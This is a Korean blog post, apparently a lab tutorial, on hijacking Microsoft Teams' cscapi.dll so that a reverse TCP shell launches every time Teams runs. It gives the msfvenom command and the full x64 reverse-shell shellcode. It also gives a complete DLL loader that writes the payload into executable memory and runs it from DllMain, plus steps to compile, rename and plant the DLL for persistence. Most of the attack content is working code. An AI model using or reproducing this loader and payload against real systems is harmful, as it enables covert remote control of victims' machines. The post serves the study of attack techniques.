DLL Hijacking 실습 (4) - 리버스 쉘
실습환경: windows 10 21H2 64bit
실습대상: microsoft team v.1.3.00.24758
실습도구: gcc, procmon, vscode 1.660, visual studio 2022 17.1.1
참고: (링크)
실습 (3)에 이어서..
MS Teams가 실행될 떄마다 reverse TCP shell이 실행되도록 할 것이다.
하이잭할 DLL은 cscapi.dll
① 악성 페이로드 생성
우선, payload에 넣어 줄 리버스 쉘 데이터가 필요하다.
메타스플로잇 프레임워크에 포함된 msfvenom을 통해 페이로드를 생성한다.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ip] LPORT=[PORT] EXITFUNC=thread -f c
/*
-p : 페이로드
-f : 출력 파일 포맷
LHOST : 공격자 ip
LPORT : 공격자 port
*/
② 리버스 tcp 쉘 코드를 실행할 파일 작성 (evil2.cpp)
#include <windows.h>
unsigned char payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x1c\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
unsigned int payload_len = sizeof(payload);
DWORD WINAPI run() {
LPVOID memory; // 페이로드를 위한 메모리 버퍼
HANDLE pHandle; // 프로세스 핸들
pHandle = GetCurrentProcess();
memory = VirtualAllocEx(pHandle, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pHandle, memory, (LPCVOID)&payload, payload_len, NULL);
((void(*)())memory)();
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
HANDLE threadhandle;
switch (fdwReason) {
case DLL_PROCESS_ATTACH:
threadhandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) run, NULL, 0, NULL);
CloseHandle(threadhandle);
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
[TIP] VirtualAllocEx() 그리고 virtualAllock()
PVOID VirtualAlloc(
PVOID pvAddress,
SIZE_T dwSize,
DWORD fdwAllocationType,
DWORD fdwProtect
);
LPVOID VirtualAllocEx(
HANDLE hProcess,
LPVOID lpAddress,
DWORD dwSize,
DWORD flAllocationType,
DWORD flProtect
);ㅇ VirtualAllocEx()
- VirtualAlloc()와 다르게 파라미터로 프로ꂌ스 핸들이 존재
- 특정 프로세스의 핸들을 인자로 주면, 그 프로세스에 메모리 공간을 할당 (다른 프로세스에도 메모리 할당 가능)
ㅇ VirtualAlloc()
- 내가 실행 중인 프로세스에 메모리를 할당
③ 실습(3)과 같이 원본 cscapi.dll 에서 exported function 추출.
→ cscapi.def
④ gcc 통해 컴파일
⑤ 이름변경: evil2.dll ▶ cscapi.dll
⑥ MS Teams 가 존재하는 폴더에 커스텀 DL을 넣어준 후 teams.exe 실행
Teams는 오류 없이 정상적으로 실행된다.
DLL Hjjacking - 임의 코드 실행(리버스쉘) 통한 지속성 달성
'System > TTPs' 카테고리의 다른 글
| APC Injection 실습 (1) (0) | 2023.03.30 |
|---|---|
| 3. APC(Asynchronous Procedure Call) Injection (0) | 2023.03.30 |
| DLL Hijacking 실습 (3) (0) | 2023.03.30 |
| DLL Hijacking 실습 (1) (0) | 2023.03.29 |
| 2. DLL Hijacking (0) | 2023.03.29 |
